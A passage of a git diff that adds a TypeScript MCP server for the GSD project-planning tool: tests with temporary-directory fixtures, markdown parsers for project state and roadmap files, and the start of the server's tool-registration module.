--------------------------------------------------------------------------- + +function tmpProject(): string { + const dir = join(tmpdir(), `gsd-mcp-test-${randomBytes(4).toString('hex')}`); + mkdirSync(dir, { recursive: true }); + return dir; +} + +function writeFixture(base: string, relPath: string, content: string): void { + const full = join(base, relPath); + mkdirSync(join(full, '..'), { recursive: true }); + writeFileSync(full, content, 'utf-8'); +} + +// --------------------------------------------------------------------------- +// readProgress tests +// --------------------------------------------------------------------------- + +describe('readProgress', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + + writeFixture(projectDir, '.gsd/STATE.md', `# GSD State + +**Active Milestone:** M002: Auth System +**Active Slice:** S01: Login flow +**Phase:** execution +**Requirements Status:** 5 active · 2 validated · 1 deferred · 0 out of scope + +## Milestone Registry + +- ☑ **M001:** Core Setup +- 🔄 **M002:** Auth System +- ⬜ **M003:** Dashboard + +## Blockers + +- Waiting on OAuth provider approval + +## Next Action + +Execute T02 in S01 — implement token refresh. +`); + + // Create filesystem structure + const m1 = '.gsd/milestones/M001/slices/S01/tasks'; + writeFixture(projectDir, `${m1}/T01-PLAN.md`, '# T01'); + writeFixture(projectDir, `${m1}/T01-SUMMARY.md`, '# T01 done'); + + const m2 = '.gsd/milestones/M002/slices/S01/tasks'; + writeFixture(projectDir, `${m2}/T01-PLAN.md`, '# T01'); + writeFixture(projectDir, `${m2}/T01-SUMMARY.md`, '# T01 done'); + writeFixture(projectDir, `${m2}/T02-PLAN.md`, '# T02'); + + mkdirSync(join(projectDir, '.gsd/milestones/M003'), { recursive: true }); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('parses active milestone from STATE.md', () => { + const result = readProgress(projectDir); + assert.deepEqual(result.activeMilestone, { id: 'M002', title: 'Auth System' }); + }); + + it('parses active slice', () => { + const result = readProgress(projectDir); + assert.deepEqual(result.activeSlice, { id: 'S01', title: 'Login flow' }); + }); + + it('parses phase', () => { + const result = readProgress(projectDir); + assert.equal(result.phase, 'execute'); + }); + + it('parses milestone counts from registry', () => { + const result = readProgress(projectDir); + assert.equal(result.milestones.total, 3); + assert.equal(result.milestones.done, 1); + assert.equal(result.milestones.active, 1); + assert.equal(result.milestones.pending, 1); + }); + + it('counts tasks from filesystem', () => { + const result = readProgress(projectDir); + assert.equal(result.tasks.total, 3); + assert.equal(result.tasks.done, 2); + assert.equal(result.tasks.pending, 1); + }); + + it('parses blockers', () => { + const result = readProgress(projectDir); + assert.equal(result.blockers.length, 1); + assert.ok(result.blockers[0].includes('OAuth')); + }); + + it('parses requirements', () => { + const result = readProgress(projectDir); + assert.equal(result.requirements?.active, 5); + assert.equal(result.requirements?.validated, 2); + assert.equal(result.requirements?.deferred, 1); + }); + + it('parses next action', () => { + const result = readProgress(projectDir); + assert.ok(result.nextAction.includes('T02')); + }); + + it('returns defaults for missing .gsd/', () => { + const empty = tmpProject(); + const result = readProgress(empty); + assert.equal(result.phase, 'unknown'); + assert.equal(result.milestones.total, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// readRoadmap tests +// --------------------------------------------------------------------------- + +describe('readRoadmap', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + + writeFixture(projectDir, '.gsd/milestones/M001/M001-CONTEXT.md', '# M001: Core Setup\n'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-ROADMAP.md', `# M001: Core Setup + +## Vision + +Build the foundation for the project. + +## Slice Overview + +| ID | Slice | Risk | Depends | Done | After this | +|----|-------|------|---------|------|------------| +| S01 | Database schema | low | — | ☑ | DB ready | +| S02 | API endpoints | medium | S01 | 🟫 | REST API live | +`); + + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/S01-PLAN.md', `# S01: Database schema + +## Tasks + +- [x] **T01: Create migrations** — Set up schema +- [x] **T02: Seed data** — Initial seed +`); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md', '# T01 done'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T02-PLAN.md', '# T02'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T02-SUMMARY.md', '# T02 done'); + + writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/S02-PLAN.md', `# S02: API endpoints + +## Tasks + +- [ ] **T01: Auth routes** — Implement auth +- [ ] **T02: User routes** — CRUD users +`); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/tasks/T02-PLAN.md', '# T02'); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('returns milestone structure', () => { + const result = readRoadmap(projectDir); + assert.equal(result.milestones.length, 1); + assert.equal(result.milestones[0].id, 'M001'); + assert.equal(result.milestones[0].title, 'Core Setup'); + }); + + it('reads vision from roadmap', () => { + const result = readRoadmap(projectDir); + assert.ok(result.milestones[0].vision.includes('foundation')); + }); + + it('parses slices from roadmap table', () => { + const result = readRoadmap(projectDir); + const slices = result.milestones[0].slices; + assert.equal(slices.length, 2); + assert.equal(slices[0].id, 'S01'); + assert.equal(slices[0].title, 'Database schema'); + assert.equal(slices[1].id, 'S02'); + }); + + it('derives slice status from task summaries', () => { + const result = readRoadmap(projectDir); + const slices = result.milestones[0].slices; + assert.equal(slices[0].status, 'done'); + assert.equal(slices[1].status, 'pending'); + }); + + it('includes tasks in slices', () => { + const result = readRoadmap(projectDir); + const s01Tasks = result.milestones[0].slices[0].tasks; + assert.equal(s01Tasks.length, 2); + assert.equal(s01Tasks[0].status, 'done'); + }); + + it('filters by milestoneId', () => { + const result = readRoadmap(projectDir, 'M999'); + assert.equal(result.milestones.length, 0); + }); +}); + +// --------------------------------------------------------------------------- +// readHistory tests +// --------------------------------------------------------------------------- + +describe('readHistory', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + writeFixture(projectDir, '.gsd/metrics.json', JSON.stringify({ + version: 1, + projectStartedAt: 1700000000000, + units: [ + { + type: 'execute-task', + id: 'M001/S01/T01', + model: 'claude-sonnet-4', + startedAt: 1700001000000, + finishedAt: 1700002000000, + tokens: { input: 10000, output: 3000, cacheRead: 2000, cacheWrite: 1000, total: 16000 }, + cost: 0.05, + toolCalls: 8, + apiRequests: 3, + }, + { + type: 'execute-task', + id: 'M001/S01/T02', + model: 'claude-sonnet-4', + startedAt: 1700003000000, + finishedAt: 1700004000000, + tokens: { input: 15000, output: 5000, cacheRead: 3000, cacheWrite: 1500, total: 24500 }, + cost: 0.08, + toolCalls: 12, + apiRequests: 5, + }, + ], + })); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('returns all entries sorted by most recent', () => { + const result = readHistory(projectDir); + assert.equal(result.entries.length, 2); + assert.equal(result.entries[0].id, 'M001/S01/T02'); // most recent first + }); + + it('computes totals', () => { + const result = readHistory(projectDir); + assert.equal(result.totals.units, 2); + assert.equal(result.totals.cost, 0.13); + assert.equal(result.totals.tokens.total, 40500); + }); + + it('respects limit', () => { + const result = readHistory(projectDir, 1); + assert.equal(result.entries.length, 1); + assert.equal(result.totals.units, 2); // totals still reflect all + }); + + it('returns empty for missing metrics', () => { + const empty = tmpProject(); + mkdirSync(join(empty, '.gsd'), { recursive: true }); + const result = readHistory(empty); + assert.equal(result.entries.length, 0); + assert.equal(result.totals.units, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// readCaptures tests +// --------------------------------------------------------------------------- + +describe('readCaptures', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + writeFixture(projectDir, '.gsd/CAPTURES.md', `# Captures + +### CAP-aaa11111 + +**Text:** Add rate limiting to API +**Captured:** 2026-04-01T10:00:00Z +**Status:** pending + +### CAP-bbb22222 + +**Text:** Refactor auth module +**Captured:** 2026-04-02T10:00:00Z +**Status:** resolved +**Classification:** inject +**Resolution:** Added to M003 roadmap +**Rationale:** Important for security +**Resolved:** 2026-04-03T10:00:00Z +**Milestone:** M003 + +### CAP-ccc33333 + +**Text:** Nice to have: dark mode +**Captured:** 2026-04-02T11:00:00Z +**Status:** resolved +**Classification:** defer +**Resolution:** Deferred to future +**Rationale:** Not blocking +**Resolved:** 2026-04-03T11:00:00Z +`); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('reads all captures', () => { + const result = readCaptures(projectDir, 'all'); + assert.equal(result.captures.length, 3); + assert.equal(result.counts.total, 3); + }); + + it('filters pending captures', () => { + const result = readCaptures(projectDir, 'pending'); + assert.equal(result.captures.length, 1); + assert.equal(result.captures[0].id, 'CAP-aaa11111'); + }); + + it('filters actionable captures (inject, replan, quick-task)', () => { + const result = readCaptures(projectDir, 'actionable'); + assert.equal(result.captures.length, 1); + assert.equal(result.captures[0].id, 'CAP-bbb22222'); + }); + + it('counts correctly regardless of filter', () => { + const result = readCaptures(projectDir, 'pending'); + assert.equal(result.counts.total, 3); + assert.equal(result.counts.pending, 1); + assert.equal(result.counts.actionable, 1); + }); + + it('returns empty for missing CAPTURES.md', () => { + const empty = tmpProject(); + mkdirSync(join(empty, '.gsd'), { recursive: true }); + const result = readCaptures(empty); + assert.equal(result.captures.length, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// readKnowledge tests +// --------------------------------------------------------------------------- + +describe('readKnowledge', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + writeFixture(projectDir, '.gsd/KNOWLEDGE.md', `# Project Knowledge + +## Rules + +| # | Scope | Rule | Why | Added | +|---|-------|------|-----|-------| +| K001 | auth | Hash passwords with bcrypt | Security requirement | manual | +| K002 | db | Use transactions for multi-table | Data consistency | auto | + +## Patterns + +| # | Pattern | Where | Notes | +|---|---------|-------|-------| +| P001 | Singleton services | services/ | Prevents duplication | + +## Lessons Learned + +| # | What Happened | Root Cause | Fix | Scope | +|---|--------------|------------|-----|-------| +| L001 | CI tests failed | Env diff | Added setup script | testing | +`); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('reads all knowledge entries', () => { + const result = readKnowledge(projectDir); + assert.equal(result.entries.length, 4); + }); + + it('counts by type', () => { + const result = readKnowledge(projectDir); + assert.equal(result.counts.rules, 2); + assert.equal(result.counts.patterns, 1); + assert.equal(result.counts.lessons, 1); + }); + + it('parses rule fields correctly', () => { + const result = readKnowledge(projectDir); + const k001 = result.entries.find((e) => e.id === 'K001'); + assert.ok(k001); + assert.equal(k001.type, 'rule'); + assert.equal(k001.scope, 'auth'); + assert.ok(k001.content.includes('bcrypt')); + }); + + it('returns empty for missing KNOWLEDGE.md', () => { + const empty = tmpProject(); + mkdirSync(join(empty, '.gsd'), { recursive: true }); + const result = readKnowledge(empty); + assert.equal(result.entries.length, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// runDoctorLite tests +// --------------------------------------------------------------------------- + +describe('runDoctorLite', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + + // M001: complete milestone (has summary) + writeFixture(projectDir, '.gsd/PROJECT.md', '# Test Project'); + writeFixture(projectDir, '.gsd/STATE.md', '# GSD State'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-CONTEXT.md', '# M001'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-ROADMAP.md', '# Roadmap'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-SUMMARY.md', '# Done'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/S01-PLAN.md', '# Plan'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md', '# T01 done'); + + // M002: incomplete — has all tasks done but no SUMMARY + writeFixture(projectDir, '.gsd/milestones/M002/M002-CONTEXT.md', '# M002'); + writeFixture(projectDir, '.gsd/milestones/M002/M002-ROADMAP.md', '# Roadmap'); + writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/S01-PLAN.md', '# Plan'); + writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/tasks/T01-SUMMARY.md', '# T01 done'); + + // M003: empty — no context, no slices + mkdirSync(join(projectDir, '.gsd/milestones/M003'), { recursive: true }); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('detects all-slices-done-missing-summary', () => { + const result = runDoctorLite(projectDir); + const issue = result.issues.find((i) => i.code === 'all_slices_done_missing_summary'); + assert.ok(issue, 'Should detect M002 missing summary'); + assert.equal(issue.unitId, 'M002'); + }); + + it('detects missing context', () => { + const result = runDoctorLite(projectDir); + const issue = result.issues.find( + (i) => i.code === 'missing_context' && i.unitId === 'M003', + ); + assert.ok(issue, 'Should detect M003 missing context'); + }); + + it('scopes to a single milestone', () => { + const result = runDoctorLite(projectDir, 'M001'); + const m002Issues = result.issues.filter((i) => i.unitId.startsWith('M002')); + assert.equal(m002Issues.length, 0, 'Should not include M002 when scoped to M001'); + }); + + it('returns ok:true for healthy project', () => { + const healthy = tmpProject(); + writeFixture(healthy, '.gsd/PROJECT.md', '# Project'); + writeFixture(healthy, '.gsd/STATE.md', '# State'); + const result = runDoctorLite(healthy); + assert.equal(result.ok, true); + rmSync(healthy, { recursive: true, force: true }); + }); + + it('handles missing .gsd/ gracefully', () => { + const empty = tmpProject(); + const result = runDoctorLite(empty); + assert.equal(result.ok, true); + assert.equal(result.issues[0].code, 'no_gsd_directory'); + rmSync(empty, { recursive: true, force: true }); + }); +}); diff --git a/packages/mcp-server/src/readers/roadmap.ts b/packages/mcp-server/src/readers/roadmap.ts new file mode 100644 index 000000000..29a6e1941 --- /dev/null +++ b/packages/mcp-server/src/readers/roadmap.ts @@ -0,0 +1,263 @@ +// GSD MCP Server — roadmap structure reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { + resolveGsdRoot, + findMilestoneIds, + resolveMilestoneFile, + findSliceIds, + resolveSliceFile, + findTaskFiles, +} from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export interface TaskInfo { + id: string; + title: string; + status: 'done' | 'pending'; +} + +export interface SliceInfo { + id: string; + title: string; + status: 'done' | 'active' | 'pending'; + risk: string; + depends: string[]; + demo: string; + tasks: TaskInfo[]; +} + +export interface MilestoneInfo { + id: string; + title: string; + status: 'done' | 'active' | 'pending' | 'parked'; + vision: string; + slices: SliceInfo[]; +} + +export interface RoadmapResult { + milestones: MilestoneInfo[]; +} + +// --------------------------------------------------------------------------- +// ROADMAP.md table parser +// --------------------------------------------------------------------------- + +function parseRoadmapTable(content: string): Array<{ + id: string; title: string; risk: string; depends: string[]; done: boolean; demo: string; +}> { + const results: Array<{ + id: string; title: string; risk: string; depends: string[]; done: boolean; demo: string; + }> = []; + + // Try table format first: | S01 | Title | risk | depends | done-icon | demo | + const tableSection = content.match(/## (?:Slice[s]?|Slice Overview|Slice Table)\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (tableSection) { + const lines = tableSection[1].split('\n'); + for (const line of lines) { + if (!line.includes('|')) continue; + const cells = line.split('|').map((c) => c.trim()).filter(Boolean); + if (cells.length < 4) continue; + if (cells[0] === 'ID' || cells[0].startsWith('--')) continue; + + const id = cells[0].match(/S\d+/)?.[0]; + if (!id) continue; + + const done = cells.some((c) => c === '\u2611' || c === '\u2705' || c.toLowerCase() === 'done'); + const depends = (cells[3] ?? '').replace(/\u2014/g, '').split(',').map((d) => d.trim()).filter(Boolean); + + results.push({ + id, + title: cells[1] ?? '', + risk: cells[2] ?? 'medium', + depends, + done, + demo: cells[5] ?? '', + }); + } + if (results.length > 0) return results; + } + + // Try checkbox format: - [x] **S01: Title** `risk:high` `depends:[S01]` + const checkboxRe = /^-\s+\[([ xX])\]\s+\*\*(S\d+):\s*(.+?)\*\*(?:.*?`risk:(\w+)`)?(?:.*?`depends:\[([^\]]*)\]`)?/gm; + let match: RegExpExecArray | null; + while ((match = checkboxRe.exec(content)) !== null) { + const [, checked, id, title, risk, deps] = match; + results.push({ + id, + title: title.trim(), + risk: risk ?? 'medium', + depends: deps ? deps.split(',').map((d) => d.trim()).filter(Boolean) : [], + done: checked !== ' ', + demo: '', + }); + } + if (results.length > 0) return results; + + // Try prose headers: ## S01: Title + const headerRe = /^##\s+(S\d+):\s*(.+)/gm; + while ((match = headerRe.exec(content)) !== null) { + results.push({ + id: match[1], + title: match[2].trim(), + risk: 'medium', + depends: [], + done: false, + demo: '', + }); + } + + return results; +} + +// --------------------------------------------------------------------------- +// PLAN.md task parser +// --------------------------------------------------------------------------- + +function parseSlicePlanTasks(content: string): Array<{ id: string; title: string; done: boolean }> { + const results: Array<{ id: string; title: string; done: boolean }> = []; + + // Checkbox format: - [x] **T01: Title** — description + const taskRe = /^-\s+\[([ xX])\]\s+\*\*(T\d+):\s*(.+?)\*\*/gm; + let match: RegExpExecArray | null; + while ((match = taskRe.exec(content)) !== null) { + results.push({ + id: match[2], + title: match[3].trim(), + done: match[1] !== ' ', + }); + } + if (results.length > 0) return results; + + // H3 format: ### T01: Title + const h3Re = /^###\s+(T\d+):\s*(.+)/gm; + while ((match = h3Re.exec(content)) !== null) { + results.push({ + id: match[1], + title: match[2].trim(), + done: false, + }); + } + + return results; +} + +// --------------------------------------------------------------------------- +// Milestone title from CONTEXT.md or ROADMAP.md H1 +// --------------------------------------------------------------------------- + +function readMilestoneTitle(gsdRoot: string, mid: string): string { + const ctxPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT'); + if (ctxPath && existsSync(ctxPath)) { + const content = readFileSync(ctxPath, 'utf-8'); + const h1 = content.match(/^#\s+(?:M\d+:?\s*)?(.+)/m); + if (h1) return h1[1].trim(); + } + + const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP'); + if (roadmapPath && existsSync(roadmapPath)) { + const content = readFileSync(roadmapPath, 'utf-8'); + const h1 = content.match(/^#\s+(?:M\d+:?\s*)?(.+)/m); + if (h1) return h1[1].trim(); + } + + return mid; +} + +function readVision(gsdRoot: string, mid: string): string { + const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP'); + if (!roadmapPath || !existsSync(roadmapPath)) return ''; + + const content = readFileSync(roadmapPath, 'utf-8'); + const section = content.match(/## Vision\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + return section ? section[1].trim() : ''; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readRoadmap(projectDir: string, filterMilestoneId?: string): RoadmapResult { + const gsd = resolveGsdRoot(projectDir); + let milestoneIds = findMilestoneIds(gsd); + + if (filterMilestoneId) { + milestoneIds = milestoneIds.filter((id) => id === filterMilestoneId); + } + + const milestones: MilestoneInfo[] = []; + + for (const mid of milestoneIds) { + const title = readMilestoneTitle(gsd, mid); + const vision = readVision(gsd, mid); + + const summaryPath = resolveMilestoneFile(gsd, mid, 'SUMMARY'); + const hasSummary = summaryPath !== null && existsSync(summaryPath); + + const roadmapPath = resolveMilestoneFile(gsd, mid, 'ROADMAP'); + let roadmapSlices: ReturnType = []; + if (roadmapPath && existsSync(roadmapPath)) { + roadmapSlices = parseRoadmapTable(readFileSync(roadmapPath, 'utf-8')); + } + + const fsSliceIds = findSliceIds(gsd, mid); + const sliceIdSet = new Set([ + ...roadmapSlices.map((s) => s.id), + ...fsSliceIds, + ]); + + const slices: SliceInfo[] = []; + for (const sid of Array.from(sliceIdSet).sort()) { + const roadmapEntry = roadmapSlices.find((s) => s.id === sid); + const taskFiles = findTaskFiles(gsd, mid, sid); + + const planPath = resolveSliceFile(gsd, mid, sid, 'PLAN'); + let planTasks: ReturnType = []; + if (planPath && existsSync(planPath)) { + planTasks = parseSlicePlanTasks(readFileSync(planPath, 'utf-8')); + } + + const tasks: TaskInfo[] = []; + const seenIds = new Set(); + + for (const pt of planTasks) { + const fsTask = taskFiles.find((t) => t.id === pt.id); + const done = fsTask?.hasSummary ?? pt.done; + tasks.push({ id: pt.id, title: pt.title, status: done ? 'done' : 'pending' }); + seenIds.add(pt.id); + } + for (const ft of taskFiles) { + if (seenIds.has(ft.id)) continue; + tasks.push({ id: ft.id, title: ft.id, status: ft.hasSummary ? 'done' : 'pending' }); + } + + const allDone = tasks.length > 0 && tasks.every((t) => t.status === 'done'); + const anyDone = tasks.some((t) => t.status === 'done'); + const sliceStatus: SliceInfo['status'] = allDone ? 'done' : anyDone ? 'active' : 'pending'; + + slices.push({ + id: sid, + title: roadmapEntry?.title ?? sid, + status: sliceStatus, + risk: roadmapEntry?.risk ?? 'medium', + depends: roadmapEntry?.depends ?? [], + demo: roadmapEntry?.demo ?? '', + tasks, + }); + } + + const allSlicesDone = slices.length > 0 && slices.every((s) => s.status === 'done'); + const anySliceActive = slices.some((s) => s.status === 'active' || s.status === 'done'); + const milestoneStatus: MilestoneInfo['status'] = hasSummary + ? 'done' + : allSlicesDone ? 'done' : anySliceActive ? 'active' : 'pending'; + + milestones.push({ id: mid, title, status: milestoneStatus, vision, slices }); + } + + return { milestones }; +} diff --git a/packages/mcp-server/src/readers/state.ts b/packages/mcp-server/src/readers/state.ts new file mode 100644 index 000000000..93ea7d38f --- /dev/null +++ b/packages/mcp-server/src/readers/state.ts @@ -0,0 +1,223 @@ +// GSD MCP Server — project state reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { + resolveGsdRoot, + resolveRootFile, + findMilestoneIds, + resolveMilestoneDir, + resolveMilestoneFile, + findSliceIds, + findTaskFiles, +} from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export interface ProgressResult { + activeMilestone: { id: string; title: string } | null; + activeSlice: { id: string; title: string } | null; + activeTask: { id: string; title: string } | null; + phase: string; + milestones: { total: number; done: number; active: number; pending: number; parked: number }; + slices: { total: number; done: number; active: number; pending: number }; + tasks: { total: number; done: number; pending: number }; + requirements: { active: number; validated: number; deferred: number; outOfScope: number } | null; + blockers: string[]; + nextAction: string; +} + +// --------------------------------------------------------------------------- +// STATE.md parser +// --------------------------------------------------------------------------- + +function parseBoldField(content: string, label: string): string | null { + const re = new RegExp(`\\*\\*${label}:\\*\\*\\s*(.+)`, 'i'); + const m = content.match(re); + return m ? m[1].trim() : null; +} + +function parseActiveRef(value: string | null): { id: string; title: string } | null { + if (!value || value.toLowerCase() === 'none' || value === '—') return null; + // "M001: Flight Simulator" or "M001" + const m = value.match(/^(M\d+|S\d+|T\d+):?\s*(.*)/); + if (m) return { id: m[1], title: m[2] || m[1] }; + return { id: value, title: value }; +} + +function parsePhase(value: string | null): string { + if (!value) return 'unknown'; + const lower = value.toLowerCase().trim(); + if (lower.includes('research') || lower.includes('discuss')) return 'research'; + if (lower.includes('plan')) return 'plan'; + if (lower.includes('execut')) return 'execute'; + if (lower.includes('complete') || lower.includes('done')) return 'complete'; + return lower; +} + +function parseRequirementsLine(value: string | null): ProgressResult['requirements'] | null { + if (!value) return null; + const active = value.match(/(\d+)\s*active/i); + const validated = value.match(/(\d+)\s*validated/i); + const deferred = value.match(/(\d+)\s*deferred/i); + const outOfScope = value.match(/(\d+)\s*out.of.scope/i); + if (!active && !validated && !deferred && !outOfScope) return null; + return { + active: active ? parseInt(active[1], 10) : 0, + validated: validated ? parseInt(validated[1], 10) : 0, + deferred: deferred ? parseInt(deferred[1], 10) : 0, + outOfScope: outOfScope ? parseInt(outOfScope[1], 10) : 0, + }; +} + +function parseBlockers(content: string): string[] { + const section = content.match(/## Blockers\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (!section) return []; + return section[1] + .split('\n') + .map((l) => l.replace(/^[-*]\s*/, '').trim()) + .filter(Boolean); +} + +function parseNextAction(content: string): string { + const section = content.match(/## Next Action\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (!section) return ''; + return section[1].trim().split('\n')[0] || ''; +} + +// --------------------------------------------------------------------------- +// Milestone registry from STATE.md +// --------------------------------------------------------------------------- + +interface RegistryEntry { id: string; status: 'done' | 'active' | 'pending' | 'parked' } + +function parseMilestoneRegistry(content: string): RegistryEntry[] { + const section = content.match(/## Milestone Registry\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (!section) return []; + const entries: RegistryEntry[] = []; + for (const line of section[1].split('\n')) { + const m = line.match(/[-*]\s*(☑|✅|🔄|⬜|⏸)\s*\*\*(M\d+):\*\*/); + if (!m) continue; + const [, icon, id] = m; + let status: RegistryEntry['status'] = 'pending'; + if (icon === '☑' || icon === '✅') status = 'done'; + else if (icon === '🔄') status = 'active'; + else if (icon === '⏸') status = 'parked'; + entries.push({ id, status }); + } + return entries; +} + +// --------------------------------------------------------------------------- +// Count slices/tasks by walking filesystem +// --------------------------------------------------------------------------- + +function countSlicesAndTasks(gsdRoot: string, milestoneIds: string[]): { + slices: ProgressResult['slices']; + tasks: ProgressResult['tasks']; +} { + let sliceTotal = 0, sliceDone = 0, sliceActive = 0; + let taskTotal = 0, taskDone = 0; + + for (const mid of milestoneIds) { + const sliceIds = findSliceIds(gsdRoot, mid); + sliceTotal += sliceIds.length; + + for (const sid of sliceIds) { + const tasks = findTaskFiles(gsdRoot, mid, sid); + taskTotal += tasks.length; + + const allDone = tasks.length > 0 && tasks.every((t) => t.hasSummary); + const anyDone = tasks.some((t) => t.hasSummary); + + if (allDone) { + sliceDone++; + taskDone += tasks.length; + } else { + if (anyDone) sliceActive++; + taskDone += tasks.filter((t) => t.hasSummary).length; + } + } + } + + return { + slices: { + total: sliceTotal, + done: sliceDone, + active: sliceActive, + pending: sliceTotal - sliceDone - sliceActive, + }, + tasks: { total: taskTotal, done: taskDone, pending: taskTotal - taskDone }, + }; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readProgress(projectDir: string): ProgressResult { + const gsd = resolveGsdRoot(projectDir); + const statePath = resolveRootFile(gsd, 'STATE.md'); + + // Defaults + const result: ProgressResult = { + activeMilestone: null, + activeSlice: null, + activeTask: null, + phase: 'unknown', + milestones: { total: 0, done: 0, active: 0, pending: 0, parked: 0 }, + slices: { total: 0, done: 0, active: 0, pending: 0 }, + tasks: { total: 0, done: 0, pending: 0 }, + requirements: null, + blockers: [], + nextAction: '', + }; + + if (!existsSync(statePath)) { + // No STATE.md — derive from filesystem only + const milestoneIds = findMilestoneIds(gsd); + result.milestones.total = milestoneIds.length; + result.milestones.pending = milestoneIds.length; + const counts = countSlicesAndTasks(gsd, milestoneIds); + result.slices = counts.slices; + result.tasks = counts.tasks; + return result; + } + + const content = readFileSync(statePath, 'utf-8'); + + // Parse STATE.md fields + result.activeMilestone = parseActiveRef(parseBoldField(content, 'Active Milestone')); + result.activeSlice = parseActiveRef(parseBoldField(content, 'Active Slice')); + result.activeTask = parseActiveRef(parseBoldField(content, 'Active Task')); + result.phase = parsePhase(parseBoldField(content, 'Phase')); + result.requirements = parseRequirementsLine(parseBoldField(content, 'Requirements Status')); + result.blockers = parseBlockers(content); + result.nextAction = parseNextAction(content); + + // Milestone counts from registry + const registry = parseMilestoneRegistry(content); + if (registry.length > 0) { + result.milestones.total = registry.length; + result.milestones.done = registry.filter((e) => e.status === 'done').length; + result.milestones.active = registry.filter((e) => e.status === 'active').length; + result.milestones.parked = registry.filter((e) => e.status === 'parked').length; + result.milestones.pending = registry.length - + result.milestones.done - result.milestones.active - result.milestones.parked; + } else { + // Fallback: count directories + const milestoneIds = findMilestoneIds(gsd); + result.milestones.total = milestoneIds.length; + result.milestones.pending = milestoneIds.length; + } + + // Slice/task counts from filesystem + const milestoneIds = findMilestoneIds(gsd); + const counts = countSlicesAndTasks(gsd, milestoneIds); + result.slices = counts.slices; + result.tasks = counts.tasks; + + return result; +} diff --git a/packages/mcp-server/src/server.ts b/packages/mcp-server/src/server.ts new file mode 100644 index 000000000..f684700ed --- /dev/null +++ b/packages/mcp-server/src/server.ts @@ -0,0 +1,409 @@ +/** + * MCP Server — registers GSD orchestration + read-only project state tools. + * + * Session tools (6): gsd_execute, gsd_status, gsd_result, gsd_cancel, gsd_query, gsd_resolve_blocker + * Read-only tools (6): gsd_progress, gsd_roadmap, gsd_history, gsd_doctor, gsd_captures, gsd_knowledge + * + * Uses dynamic imports for @modelcontextprotocol/sdk because TS Node16 + * cannot resolve the SDK's subpath exports statically (same pattern as + * src/mcp-server.ts in the main package). + */ + +import { readFile, readdir, stat } from 'node:fs/promises'; +import { join, resolve } from 'node:path'; +import { z } from 'zod'; +import type { SessionManager } from './session-manager.js'; +import { readProgress } from './readers/state.js'; +import { readRoadmap } from './readers/roadmap.js'; +import { readHistory } from './readers/metrics.js'; +import { readCaptures } from './readers/captures.js'; +import { readKnowledge } from './readers/knowledge.js'; +import { runDoctorLite } from './readers/doctor-lite.js'; + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +const MCP_PKG = '@modelcontextprotocol/sdk'; +const SERVER_NAME = 'gsd'; +const SERVER_VERSION = '2.53.0'; + +// --------------------------------------------------------------------------- +// Tool result helpers +// --------------------------------------------------------------------------- + +/** Wrap a JSON-serializable value as MCP tool content. */ +function jsonContent(data: unknown): { content: Array<{ type: 'text'; text: string }> } { + return { content: [{ type: 'text' as const, text: JSON.stringify(data, null, 2) }] }; +} + +/** Return an MCP error response. */ +function errorContent(message: string): { isError: true; content: Array<{ type: 'text'; text: string }> } { + return { isError: true, content: [{ type: 'text' as const, text: message }] }; +} + +// --------------------------------------------------------------------------- +// gsd_query filesystem reader +// 